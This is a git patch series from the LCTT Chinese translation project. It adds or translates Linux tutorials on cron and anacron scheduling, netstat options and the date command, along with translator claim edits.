0000000000..3165aa8139 --- /dev/null +++ b/sources/tech/20171207 How to use cron in Linux.md @@ -0,0 +1,288 @@ +translating by yongshouzhang + +How to use cron in Linux +============================================================ + +### No time for commands? Scheduling tasks with cron means programs can run but you don't have to stay up late. + + [![](https://opensource.com/sites/default/files/styles/byline_thumbnail/public/david-crop.jpg?itok=Wnz6HdS0)][10] 06 Nov 2017 [David Both][11] [Feed][12] + +27[up][13] + + [9 comments][14] +![How to use cron in Linux](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/linux-penguins.png?itok=yKOpaJM_) + +Image by : + +[Internet Archive Book Images][15]. Modified by Opensource.com. [CC BY-SA 4.0][16] + +One of the challenges (among the many advantages) of being a sysadmin is running tasks when you'd rather be sleeping. For example, some tasks (including regularly recurring tasks) need to run overnight or on weekends, when no one is expected to be using computer resources. I have no time to spare in the evenings to run commands and scripts that have to operate during off-hours. And I don't want to have to get up at oh-dark-hundred to start a backup or major update. + +Instead, I use two service utilities that allow me to run commands, programs, and tasks at predetermined times. The [cron][17] and at services enable sysadmins to schedule tasks to run at a specific time in the future. The at service specifies a one-time task that runs at a certain time. The cron service can schedule tasks on a repetitive basis, such as daily, weekly, or monthly. + +In this article, I'll introduce the cron service and how to use it. + +### Common (and uncommon) cron uses + +I use the cron service to schedule obvious things, such as regular backups that occur daily at 2 a.m. I also use it for less obvious things. + +* The system times (i.e., the operating system time) on my many computers are set using the Network Time Protocol (NTP). While NTP sets the system time, it does not set the hardware time, which can drift. I use cron to set the hardware time based on the system time. + +* I also have a Bash program I run early every morning that creates a new "message of the day" (MOTD) on each computer. It contains information, such as disk usage, that should be current in order to be useful. + +* Many system processes and services, like [Logwatch][1], [logrotate][2], and [Rootkit Hunter][3], use the cron service to schedule tasks and run programs every day. + +The crond daemon is the background service that enables cron functionality. + +The cron service checks for files in the /var/spool/cron and /etc/cron.d directories and the /etc/anacrontab file. The contents of these files define cron jobs that are to be run at various intervals. The individual user cron files are located in /var/spool/cron, and system services and applications generally add cron job files in the /etc/cron.ddirectory. The /etc/anacrontab is a special case that will be covered later in this article. + +### Using crontab + +The cron utility runs based on commands specified in a cron table (crontab). Each user, including root, can have a cron file. These files don't exist by default, but can be created in the /var/spool/cron directory using the crontab -e command that's also used to edit a cron file (see the script below). I strongly recommend that you not use a standard editor (such as Vi, Vim, Emacs, Nano, or any of the many other editors that are available). Using the crontab command not only allows you to edit the command, it also restarts the crond daemon when you save and exit the editor. The crontabcommand uses Vi as its underlying editor, because Vi is always present (on even the most basic of installations). + +New cron files are empty, so commands must be added from scratch. I added the job definition example below to my own cron files, just as a quick reference, so I know what the various parts of a command mean. Feel free to copy it for your own use. + +``` +# crontab -e +SHELL=/bin/bash +MAILTO=root@example.com +PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin + +# For details see man 4 crontabs + +# Example of job definition: +# .---------------- minute (0 - 59) +# | .------------- hour (0 - 23) +# | | .---------- day of month (1 - 31) +# | | | .------- month (1 - 12) OR jan,feb,mar,apr ... +# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat +# | | | | | +# * * * * * user-name command to be executed + +# backup using the rsbu program to the internal 4TB HDD and then 4TB external +01 01 * * * /usr/local/bin/rsbu -vbd1 ; /usr/local/bin/rsbu -vbd2 + +# Set the hardware clock to keep it in sync with the more accurate system clock +03 05 * * * /sbin/hwclock --systohc + +# Perform monthly updates on the first of the month +# 25 04 1 * * /usr/bin/dnf -y update +``` + +The first three lines in the code above set up a default environment. The environment must be set to whatever is necessary for a given user because cron does not provide an environment of any kind. The SHELL variable specifies the shell to use when commands are executed. This example specifies the Bash shell. The MAILTO variable sets the email address where cron job results will be sent. These emails can provide the status of the cron job (backups, updates, etc.) and consist of the output you would see if you ran the program manually from the command line. The third line sets up the PATH for the environment. Even though the path is set here, I always prepend the fully qualified path to each executable. + +There are several comment lines in the example above that detail the syntax required to define a cron job. I'll break those commands down, then add a few more to show you some more advanced capabilities of crontab files. + +``` +01 01 * * * /usr/local/bin/rsbu -vbd1 ; /usr/local/bin/rsbu -vbd2 +``` + +This line runs my self-written Bash shell script, rsbu, that backs up all my systems. This job kicks off at 1:01 a.m. (01 01) every day. The asterisks (*) in positions three, four, and five of the time specification are like file globs, or wildcards, for other time divisions; they specify "every day of the month," "every month," and "every day of the week." This line runs my backups twice; one backs up to an internal dedicated backup hard drive, and the other backs up to an external USB drive that I can take to the safe deposit box. + +The following line sets the hardware clock on the computer using the system clock as the source of an accurate time. This line is set to run at 5:03 a.m. (03 05) every day. + +``` +03 05 * * * /sbin/hwclock --systohc +``` + +I was using the third and final cron job (commented out) to perform a dnf or yumupdate at 04:25 a.m. on the first day of each month, but I commented it out so it no longer runs. + +``` +# 25 04 1 * * /usr/bin/dnf -y update +``` + +### Other scheduling tricks + +Now let's do some things that are a little more interesting than these basics. Suppose you want to run a particular job every Thursday at 3 p.m.: + +``` +00 15 * * Thu /usr/local/bin/mycronjob.sh +``` + +Or, maybe you need to run quarterly reports after the end of each quarter. The cron service has no option for "The last day of the month," so instead you can use the first day of the following month, as shown below. (This assumes that the data needed for the reports will be ready when the job is set to run.) + +``` +02 03 1 1,4,7,10 * /usr/local/bin/reports.sh +``` + +The following shows a job that runs one minute past every hour between 9:01 a.m. and 5:01 p.m. + +``` +01 09-17 * * * /usr/local/bin/hourlyreminder.sh +``` + +I have encountered situations where I need to run a job every two, three, or four hours. That can be accomplished by dividing the hours by the desired interval, such as */3 for every three hours, or 6-18/3 to run every three hours between 6 a.m. and 6 p.m. Other intervals can be divided similarly; for example, the expression */15 in the minutes position means "run the job every 15 minutes." + +``` +*/5 08-18/2 * * * /usr/local/bin/mycronjob.sh +``` + +One thing to note: The division expressions must result in a remainder of zero for the job to run. That's why, in this example, the job is set to run every five minutes (08:05, 08:10, 08:15, etc.) during even-numbered hours from 8 a.m. to 6 p.m., but not during any odd-numbered hours. For example, the job will not run at all from 9 p.m. to 9:59 a.m. + +I am sure you can come up with many other possibilities based on these examples. + +### Limiting cron access + +More Linux resources + +* [What is Linux?][4] + +* [What are Linux containers?][5] + +* [Download Now: Linux commands cheat sheet][6] + +* [Advanced Linux commands cheat sheet][7] + +* [Our latest Linux articles][8] + +Regular users with cron access could make mistakes that, for example, might cause system resources (such as memory and CPU time) to be swamped. To prevent possible misuse, the sysadmin can limit user access by creating a + +**/etc/cron.allow** + + file that contains a list of all users with permission to create cron jobs. The root user cannot be prevented from using cron. + +By preventing non-root users from creating their own cron jobs, it may be necessary for root to add their cron jobs to the root crontab. "But wait!" you say. "Doesn't that run those jobs as root?" Not necessarily. In the first example in this article, the username field shown in the comments can be used to specify the user ID a job is to have when it runs. This prevents the specified non-root user's jobs from running as root. The following example shows a job definition that runs a job as the user "student": + +``` +04 07 * * * student /usr/local/bin/mycronjob.sh +``` + +### cron.d + +The directory /etc/cron.d is where some applications, such as [SpamAssassin][18] and [sysstat][19], install cron files. Because there is no spamassassin or sysstat user, these programs need a place to locate cron files, so they are placed in /etc/cron.d. + +The /etc/cron.d/sysstat file below contains cron jobs that relate to system activity reporting (SAR). These cron files have the same format as a user cron file. + +``` +# Run system activity accounting tool every 10 minutes +*/10 * * * * root /usr/lib64/sa/sa1 1 1 +# Generate a daily summary of process accounting at 23:53 +53 23 * * * root /usr/lib64/sa/sa2 -A +``` + +The sysstat cron file has two lines that perform tasks. The first line runs the sa1program every 10 minutes to collect data stored in special binary files in the /var/log/sadirectory. Then, every night at 23:53, the sa2 program runs to create a daily summary. + +### Scheduling tips + +Some of the times I set in the crontab files seem rather random—and to some extent they are. Trying to schedule cron jobs can be challenging, especially as the number of jobs increases. I usually have only a few tasks to schedule on each of my computers, which is simpler than in some of the production and lab environments where I have worked. + +One system I administered had around a dozen cron jobs that ran every night and an additional three or four that ran on weekends or the first of the month. That was a challenge, because if too many jobs ran at the same time—especially the backups and compiles—the system would run out of RAM and nearly fill the swap file, which resulted in system thrashing while performance tanked, so nothing got done. We added more memory and improved how we scheduled tasks. We also removed a task that was very poorly written and used large amounts of memory. + +The crond service assumes that the host computer runs all the time. That means that if the computer is turned off during a period when cron jobs were scheduled to run, they will not run until the next time they are scheduled. This might cause problems if they are critical cron jobs. Fortunately, there is another option for running jobs at regular intervals: anacron. + +### anacron + +The [anacron][20] program performs the same function as crond, but it adds the ability to run jobs that were skipped, such as if the computer was off or otherwise unable to run the job for one or more cycles. This is very useful for laptops and other computers that are turned off or put into sleep mode. + +As soon as the computer is turned on and booted, anacron checks to see whether configured jobs missed their last scheduled run. If they have, those jobs run immediately, but only once (no matter how many cycles have been missed). For example, if a weekly job was not run for three weeks because the system was shut down while you were on vacation, it would be run soon after you turn the computer on, but only once, not three times. + +The anacron program provides some easy options for running regularly scheduled tasks. Just install your scripts in the /etc/cron.[hourly|daily|weekly|monthly]directories, depending how frequently they need to be run. + +How does this work? The sequence is simpler than it first appears. + +1. The crond service runs the cron job specified in /etc/cron.d/0hourly. + +``` +# Run the hourly jobs +SHELL=/bin/bash +PATH=/sbin:/bin:/usr/sbin:/usr/bin +MAILTO=root +01 * * * * root run-parts /etc/cron.hourly +``` + +1. The cron job specified in /etc/cron.d/0hourly runs the run-parts program once per hour. + +2. The run-parts program runs all the scripts located in the /etc/cron.hourlydirectory. + +3. The /etc/cron.hourly directory contains the 0anacron script, which runs the anacron program using the /etdc/anacrontab configuration file shown here. + +``` +# /etc/anacrontab: configuration file for anacron + +# See anacron(8) and anacrontab(5) for details. + +SHELL=/bin/sh +PATH=/sbin:/bin:/usr/sbin:/usr/bin +MAILTO=root +# the maximal random delay added to the base delay of the jobs +RANDOM_DELAY=45 +# the jobs will be started during the following hours only +START_HOURS_RANGE=3-22 + +#period in days delay in minutes job-identifier command +1 5 cron.daily nice run-parts /etc/cron.daily +7 25 cron.weekly nice run-parts /etc/cron.weekly +@monthly 45 cron.monthly nice run-parts /etc/cron.monthly +``` + +1. The anacron program runs the programs located in /etc/cron.daily once per day; it runs the jobs located in /etc/cron.weekly once per week, and the jobs in cron.monthly once per month. Note the specified delay times in each line that help prevent these jobs from overlapping themselves and other cron jobs. + +Instead of placing complete Bash programs in the cron.X directories, I install them in the /usr/local/bin directory, which allows me to run them easily from the command line. Then I add a symlink in the appropriate cron directory, such as /etc/cron.daily. + +The anacron program is not designed to run programs at specific times. Rather, it is intended to run programs at intervals that begin at the specified times, such as 3 a.m. (see the START_HOURS_RANGE line in the script just above) of each day, on Sunday (to begin the week), and on the first day of the month. If any one or more cycles are missed, anacron will run the missed jobs once, as soon as possible. + +### More on setting limits + +I use most of these methods for scheduling tasks to run on my computers. All those tasks are ones that need to run with root privileges. It's rare in my experience that regular users really need a cron job. One case was a developer user who needed a cron job to kick off a daily compile in a development lab. + +It is important to restrict access to cron functions by non-root users. However, there are circumstances when a user needs to set a task to run at pre-specified times, and cron can allow them to do that. Many users do not understand how to properly configure these tasks using cron and they make mistakes. Those mistakes may be harmless, but, more often than not, they can cause problems. By setting functional policies that cause users to interact with the sysadmin, individual cron jobs are much less likely to interfere with other users and other system functions. + +It is possible to set limits on the total resources that can be allocated to individual users or groups, but that is an article for another time. + +For more information, the man pages for [cron][21], [crontab][22], [anacron][23], [anacrontab][24], and [run-parts][25] all have excellent information and descriptions of how the cron system works. + +### Topics + + [Linux][26][SysAdmin][27] + +### About the author + + [![](https://opensource.com/sites/default/files/styles/profile_pictures/public/david-crop.jpg?itok=oePpOpyV)][28] David Both + +- + + David Both is a Linux and Open Source advocate who resides in Raleigh, North Carolina. He has been in the IT industry for over forty years and taught OS/2 for IBM where he worked for over 20 years. While at IBM, he wrote the first training course for the original IBM PC in 1981\. He has taught RHCE classes for Red Hat and has worked at MCI Worldcom, Cisco, and the State of North Carolina. He has been working with Linux and Open Source Software for almost 20 years. David has written articles for... [more about David Both][29][More about me][30] + +* [Learn how you can contribute][9] + +-------------------------------------------------------------------------------- + +via: https://opensource.com/article/17/11/how-use-cron-linux + +作者:[David Both ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]: +[1]:https://sourceforge.net/projects/logwatch/files/ +[2]:https://github.com/logrotate/logrotate +[3]:http://rkhunter.sourceforge.net/ +[4]:https://opensource.com/resources/what-is-linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[5]:https://opensource.com/resources/what-are-linux-containers?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[6]:https://developers.redhat.com/promotions/linux-cheatsheet/?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[7]:https://developers.redhat.com/cheat-sheet/advanced-linux-commands-cheatsheet?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[8]:https://opensource.com/tags/linux?intcmp=70160000000h1jYAAQ&utm_source=intcallout&utm_campaign=linuxcontent +[9]:https://opensource.com/participate +[10]:https://opensource.com/users/dboth +[11]:https://opensource.com/users/dboth +[12]:https://opensource.com/user/14106/feed +[13]:https://opensource.com/article/17/11/how-use-cron-linux?rate=9R7lrdQXsne44wxIh0Wu91ytYaxxi86zT1-uHo1a1IU +[14]:https://opensource.com/article/17/11/how-use-cron-linux#comments +[15]:https://www.flickr.com/photos/internetarchivebookimages/20570945848/in/photolist-xkMtw9-xA5zGL-tEQLWZ-wFwzFM-aNwxgn-aFdWBj-uyFKYv-7ZCCBU-obY1yX-UAPafA-otBzDF-ovdDo6-7doxUH-obYkeH-9XbHKV-8Zk4qi-apz7Ky-apz8Qu-8ZoaWG-orziEy-aNwxC6-od8NTv-apwpMr-8Zk4vn-UAP9Sb-otVa3R-apz6Cb-9EMPj6-eKfyEL-cv5mwu-otTtHk-7YjK1J-ovhxf6-otCg2K-8ZoaJf-UAPakL-8Zo8j7-8Zk74v-otp4Ls-8Zo8h7-i7xvpR-otSosT-9EMPja-8Zk6Zi-XHpSDB-hLkuF3-of24Gf-ouN1Gv-fJzkJS-icfbY9 +[16]:https://creativecommons.org/licenses/by-sa/4.0/ +[17]:https://en.wikipedia.org/wiki/Cron +[18]:http://spamassassin.apache.org/ +[19]:https://github.com/sysstat/sysstat +[20]:https://en.wikipedia.org/wiki/Anacron +[21]:http://man7.org/linux/man-pages/man8/cron.8.html +[22]:http://man7.org/linux/man-pages/man5/crontab.5.html +[23]:http://man7.org/linux/man-pages/man8/anacron.8.html +[24]:http://man7.org/linux/man-pages/man5/anacrontab.5.html +[25]:http://manpages.ubuntu.com/manpages/zesty/man8/run-parts.8.html +[26]:https://opensource.com/tags/linux +[27]:https://opensource.com/tags/sysadmin +[28]:https://opensource.com/users/dboth +[29]:https://opensource.com/users/dboth +[30]:https://opensource.com/users/dboth From 62f0b7686a710da078c84e24922bc6dd828429fe Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 7 Dec 2017 20:48:57 +0800 Subject: [PATCH 0388/1627] translated --- ...mand Learn to use netstat with examples.md | 99 ++++++++++++------- 1 file changed, 62 insertions(+), 37 deletions(-) diff --git a/sources/tech/20171205 NETSTAT Command Learn to use netstat with examples.md b/sources/tech/20171205 NETSTAT Command Learn to use netstat with examples.md index 4001ab5c08..b2b7175749 100644 --- a/sources/tech/20171205 NETSTAT Command Learn to use netstat with examples.md +++ b/sources/tech/20171205 NETSTAT Command Learn to use netstat with examples.md @@ -1,103 +1,128 @@ -translating by lujun9972 -translating by lujun9972 -NETSTAT Command: Learn to use netstat with examples +NETSTAT 命令: 通过案例学习使用 netstate ====== -Netstat is a command line utility that tells us about all the tcp/udp/unix socket connections on our system. It provides list of all connections that are currently established or are in waiting state. This tool is extremely useful in identifying the port numbers on which an application is working and we can also make sure if an application is working or not on the port it is supposed to work. +Netstat 是一个告诉我们系统中所有 tcp/udp/unix socket 连接状态的命令行工具。它会列出所有已经连接或者等待连接状态的连接。 该工具在识别某个应用监听哪个端口时特别有用,我们也能用它来判断某个应用是否正常的在监听某个端口。 -Netstat command also displays various other network related information such as routing tables, interface statistics, masquerade connections, multicast memberships etc., +Netstat 命令还能显示其他各种各样的网络相关信息,例如路由表, 网卡统计信息, 虚假连接以及多播成员等。 -In this tutorial, we will learn about Netstat with examples. +本文中,我们会通过几个例子来学习 Netstat。 -(Recommended Read: [Learn to use CURL command with examples][1] ) +(推荐阅读: [Learn to use CURL command with examples][1] ) Netstat with examples ============================================================ -### 1- Checking all connections - -To list out all the connections on a system, we can use ‘a’ option with netstat command, +### 1- 检查所有的连接 +使用 `a` 选项可以列出系统中的所有连接, +```shell $ netstat -a +``` -This will produce all tcp, udp & unix connections from the system. +这会显示系统所有的 tcp,udp 以及 unix 连接。 -### 2- Checking all tcp or udp or unix socket connections +### 2- 检查所有的 tcp/udp/unix socket 连接 -To list only the tcp connections our system, use ‘t’ options with netstat, +使用 `t` 选项只列出 tcp 连接, +```shell $ netstat -at +``` -Similarly to list out only the udp connections on our system, we can use ‘u’ option with netstat, +类似的,使用 `u` 选项只列出 udp 连接 to list out only the udp connections on our system, we can use ‘u’ option with netstat, +```shell $ netstat -au +``` -To only list out Unix socket connections, we can use ‘x’ options, +使用 `x` 选项只列出 Unix socket 连接,we can use ‘x’ options, +```shell $ netstat -ax +``` -### 3- List process id/Process Name with +### 3- 同时列出进程 ID/进程名称 -To get list of all connections along with PID or process name, we can use ‘p’ option & it can be used in combination with any other netstat option, +使用 `p` 选项可以在列出连接的同时也显示 PID 或者进程名称,而且它还能与其他选项连用, +```shell $ netstat -ap +``` -### 4- List only port number & not the name +### 4- 列出端口号而不是服务名 -To speed up our output, we can use ‘n’ option as it will perform any reverse lookup & produce output with only numbers. Since no lookup is performed, our output will much faster. +使用 `n` 选项可以加快输出,它不会执行任何反向查询(译者注:这里原文说的是 "it will perform any reverse lookup",应该是写错了),而是直接输出数字。 由于无需查询,因此结果输出会快很多。 +```shell $ netstat -an +``` -### 5- Print only listening ports +### 5- 只输出监听端口 -To print only the listening ports , we will use ‘l’ option with netstat. It will not be used with ‘a’ as it prints all ports, +使用 `l` 选项只输出监听端口。它不能与 `a` 选项连用,因为 `a` 会输出所有端口, +```shell $ netstat -l +``` -### 6- Print network stats +### 6- 输出网络状态 -To print network statistics of each protocol like packet received or transmitted, we can use ‘s’ options with netstat, +使用 `s` 选项输出每个协议的统计信息,包括接收/发送的包数量 +```shell $ netstat -s +``` -### 7- Print interfaces stats +### 7- 输出网卡状态 -To display only the statistics on network interfaces, use ‘I’ option, +使用 `I` 选项只显示网卡的统计信息, +```shell $ netstat -i +``` -### 8-Display multicast group information +### 8- 显示多播组(multicast group)信息 -With option ‘g’ , we can print the multicast group information for IPV4 & IPV6, +使用 `g` 选项输出 IPV4 以及 IPV6 的多播组信息, +```shell $ netstat -g +``` -### 9- Display the network routing information +### 9- 显示网络路由信息 -To print the network routing information, use ‘r’ option, +使用 `r` 输出网络路由信息, +```shell $ netstat -r +``` -### 10- Continuous output +### 10- 持续输出 -To get continuous output of netstat, use ‘c’ option +使用 `c` 选项持续输出结果 +```shell $ netstat -c +``` -### 11- Filtering a single port +### 11- 过滤出某个端口 -To filter a single port connections, we can combine ‘grep’ command with netstat, +与 `grep` 连用来过滤出某个端口的连接, +```shell $ netstat -anp | grep 3306 +``` -### 12- Count number of connections +### 12- 统计连接个数 -To count the number of connections from port, we can further add ‘wc’ command with netstat & grep command, +通过与 wc 和 grep 命令连用,可以统计指定端口的连接数量 +```shell $ netstat -anp | grep 3306 | wc -l +``` -This will print the number of connections for the port mysql port i.e. 3306. +这回输出 mysql 服务端口(即 3306)的连接数。 -This was our brief tutorial on Netstat with examples, hope it was informative enough. If you have any query or suggestion, please mention it in the comment box below. +这就是我们间断的案例指南了,希望它带给你的信息量足够。 有任何疑问欢迎提出。 -------------------------------------------------------------------------------- From fac25d49bafe4d827dccd879e1a9e70eaa57d840 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 7 Dec 2017 20:50:31 +0800 Subject: [PATCH 0389/1627] =?UTF-8?q?=E7=BF=BB=E8=AF=91=E5=AE=8C=E6=AF=95?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...20171205 NETSTAT Command Learn to use netstat with examples.md | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {sources => translated}/tech/20171205 NETSTAT Command Learn to use netstat with examples.md (100%) diff --git a/sources/tech/20171205 NETSTAT Command Learn to use netstat with examples.md b/translated/tech/20171205 NETSTAT Command Learn to use netstat with examples.md similarity index 100% rename from sources/tech/20171205 NETSTAT Command Learn to use netstat with examples.md rename to translated/tech/20171205 NETSTAT Command Learn to use netstat with examples.md From e0c14254869c1652918c0d5cfae4c12d1345bba4 Mon Sep 17 00:00:00 2001 From: darksun Date: Thu, 7 Dec 2017 20:58:58 +0800 Subject: [PATCH 0390/1627] =?UTF-8?q?=E9=80=89=E9=A2=98:=20How=20to=20Use?= =?UTF-8?q?=20the=20Date=20Command=20in=20Linux?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...05 How to Use the Date Command in Linux.md | 164 ++++++++++++++++++ 1 file changed, 164 insertions(+) create mode 100644 sources/tech/20171205 How to Use the Date Command in Linux.md diff --git a/sources/tech/20171205 How to Use the Date Command in Linux.md b/sources/tech/20171205 How to Use the Date Command in Linux.md new file mode 100644 index 0000000000..0c0f9a31aa --- /dev/null +++ b/sources/tech/20171205 How to Use the Date Command in Linux.md @@ -0,0 +1,164 @@ +translating by lujun9972 +How to Use the Date Command in Linux +====== +In this post, we will show you some examples on how to use the date command in Linux. The date command can be used to print or set the system date and time. Using the Date Command in Linux its simple, just follow the examples and the syntax below. + +By default when running the date command in Linux, without any arguments it will display the current system date and time: + +``` +date +``` + +``` +Sat 2 Dec 12:34:12 CST 2017 +``` + +#### Syntax + +``` +Usage: date [OPTION]... [+FORMAT] + or: date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]] +Display the current time in the given FORMAT, or set the system date. + +``` + +### Date examples + +The following examples will show you how to use the date command to find the date and time from a period of time in the past or future. + +### 1\. Find the date 5 weeks in the future + +``` +date -d "5 weeks" +Sun Jan 7 19:53:50 CST 2018 + +``` + +### 2\. Find the date 5 weeks and 4 days in the future + +``` +date -d "5 weeks 4 days" +Thu Jan 11 19:55:35 CST 2018 + +``` + +### 3\. Get the next month date + +``` +date -d "next month" +Wed Jan 3 19:57:43 CST 2018 +``` + +### 4\. Get the last sunday date + +``` +date -d last-sunday +Sun Nov 26 00:00:00 CST 2017 +``` + +The date command comes with various formatting option, the following examples will show you how to format the date command output. + +### 5\. Display the date in yyyy-mm-dd format + +``` +date +"%F" +2017-12-03 +``` + +### 6\. Display date in mm/dd/yyyy format + +``` +date +"%m/%d/%Y" +12/03/2017 + +``` + +### 7\. Display only the time + +``` +date +"%T" +20:07:04 + +``` + +### 8\. Display the day of the year + +``` +date +"%j" +337 + +``` + +### 9\. Formatting Options + +| **%%** | A literal percent sign (“**%**“). | +| **%a** | The abbreviated weekday name (e.g., **Sun**). | +| **%A** | The full weekday name (e.g., **Sunday**). | +| **%b** | The abbreviated month name (e.g., **Jan**). | +| **%B** | Locale’s full month name (e.g., **January**). | +| **%c** | The date and time (e.g., **Thu Mar 3 23:05:25 2005**). | +| **%C** | The current century; like **%Y**, except omit last two digits (e.g., **20**). | +| **%d** | Day of month (e.g., **01**). | +| **%D** | Date; same as **%m/%d/%y**. | +| **%e** | Day of month, space padded; same as **%_d**. | +| **%F** | Full date; same as **%Y-%m-%d**. | +| **%g** | Last two digits of year of ISO week number (see **%G**). | +| **%G** | Year of ISO week number (see **%V**); normally useful only with **%V**. | +| **%h** | Same as **%b**. | +| **%H** | Hour (**00**..**23**). | +| **%I** | Hour (**01**..**12**). | +| **%j** | Day of year (**001**..**366**). | +| **%k** | Hour, space padded ( **0**..**23**); same as **%_H**. | +| **%l** | Hour, space padded ( **1**..**12**); same as **%_I**. | +| **%m** | Month (**01**..**12**). | +| **%M** | Minute (**00**..**59**). | +| **%n** | A newline. | +| **%N** | Nanoseconds (**000000000**..**999999999**). | +| **%p** | Locale’s equivalent of either **AM** or **PM**; blank if not known. | +| **%P** | Like **%p**, but lower case. | +| **%r** | Locale’s 12-hour clock time (e.g., **11:11:04 PM**). | +| **%R** | 24-hour hour and minute; same as **%H:%M**. | +| **%s** | Seconds since 1970-01-01 00:00:00 UTC. | +| **%S** | Second (**00**..**60**). | +| **%t** | A tab. | +| **%T** | Time; same as **%H:%M:%S**. | +| **%u** | Day of week (**1**..**7**); 1 is **Monday**. | +| **%U** | Week number of year, with Sunday as first day of week (**00**..**53**). | +| **%V** | ISO week number, with Monday as first day of week (**01**..**53**). | +| **%w** | Day of week (**0**..**6**); 0 is **Sunday**. | +| **%W** | Week number of year, with Monday as first day of week (**00**..**53**). | +| **%x** | Locale’s date representation (e.g., **12/31/99**). | +| **%X** | Locale’s time representation (e.g., **23:13:48**). | +| **%y** | Last two digits of year (**00**..**99**). | +| **%Y** | Year. | +| **%z** | +hhmm numeric time zone (e.g., **-0400**). | +| **%:z** | +hh:mm numeric time zone (e.g., **-04:00**). | +| **%::z** | +hh:mm:ss numeric time zone (e.g., **-04:00:00**). | +| **%:::z** | Numeric time zone with “**:**” to necessary precision (e.g., **-04**, **+05:30**). | +| **%Z** | Alphabetic time zone abbreviation (e.g., EDT). | + +### 10\. Set the system clock + +With the date command in Linux, you can also manually set the system clock using the --set switch, in the following example we will set the system date to 4:22pm August 30, 2017 + +``` +date --set="20170830 16:22" + +``` + +Of course, if you use one of our [VPS Hosting services][1], you can always contact and ask our expert Linux admins (via chat or ticket) about date command in linux and anything related to date examples on Linux. They are available 24×7 and will provide information or assistance immediately. + +PS. If you liked this post on How to Use the Date Command in Linux please share it with your friends on the social networks using the buttons below or simply leave a reply. Thanks. + +-------------------------------------------------------------------------------- + +via: https://www.rosehosting.com/blog/use-the-date-command-in-linux/ + +作者:[][a] +译者:[lujun9972](https://github.com/lujun9972) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.rosehosting.com +[1]:https://www.rosehosting.com/hosting-services.html From df080cad71b795d893839fbecd8fb638688a5596 Mon Sep 17 00:00:00 2001 From: imquanquan Date: Thu, 7 Dec 2017 21:22:20 +0800 Subject: [PATCH 0391/1627] apply for translation --- ... A Command Or Program Will Exactly Do Before Executing It.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/sources/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md b/sources/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md index 417be5b294..21ac6f86d1 100644 --- a/sources/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md +++ b/sources/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md @@ -1,3 +1,5 @@ +translating--imquanquan + How To Know What A Command Or Program Will Exactly Do Before Executing It ====== Ever wondered what a Unix command will do before executing it? Not everyone knows what a particular command or program will do. Of course, you can check it with [Explainshell][2]. You need to copy/paste the command in Explainshell website and it let you know what each part of a Linux command does. However, it is not necessary. Now, we can easily know what a command or program will exactly do before executing it, right from the Terminal. Say hello to “maybe”, a simple tool that allows you to run a command and see what it does to your files without actually doing it! After reviewing the output listed, you can then decide whether you really want to run it or not. From 70212482a249d7627cce9072f4d312f7953bbd04 Mon Sep 17 00:00:00 2001 From: imquanquan Date: Thu, 7 Dec 2017 21:25:54 +0800 Subject: [PATCH 0392/1627] apply for translation --- ... A Command Or Program Will Exactly Do Before Executing It.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/sources/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md b/sources/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md index 21ac6f86d1..bc7b2c9cb2 100644 --- a/sources/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md +++ b/sources/tech/20171204 How To Know What A Command Or Program Will Exactly Do Before Executing It.md @@ -1,4 +1,4 @@ -translating--imquanquan +translating by imquanquan How To Know What A Command Or Program Will Exactly Do Before Executing It ====== From 25b6a4a5fa620555322d90eb4531911b0c51c837 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=BC=A0=E5=AE=88=E6=B0=B8?= Date: Thu, 7 Dec 2017 22:49:53 +0800 Subject: [PATCH 0393/1627] Update 20171207 How to use cron in Linux.md --- .../tech/20171207 How to use cron in Linux.md | 15 +++++++-------- 1 file changed, 7 insertions(+), 8 deletions(-) diff --git a/sources/tech/20171207 How to use cron in Linux.md b/sources/tech/20171207 How to use cron in Linux.md index 3165aa8139..3df9c1b402 100644 --- a/sources/tech/20171207 How to use cron in Linux.md +++ b/sources/tech/20171207 How to use cron in Linux.md @@ -1,28 +1,27 @@ translating by yongshouzhang -How to use cron in Linux +如何在linux中使用cron ============================================================ -### No time for commands? Scheduling tasks with cron means programs can run but you don't have to stay up late. - +### 没有时间键入命令? 使用 cron 调度任务意味着你不必熬夜守着程序,就可以让它运行。 [![](https://opensource.com/sites/default/files/styles/byline_thumbnail/public/david-crop.jpg?itok=Wnz6HdS0)][10] 06 Nov 2017 [David Both][11] [Feed][12] 27[up][13] [9 comments][14] -![How to use cron in Linux](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/linux-penguins.png?itok=yKOpaJM_) +![如何在 linux 中使用cron](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/linux-penguins.png?itok=yKOpaJM_) 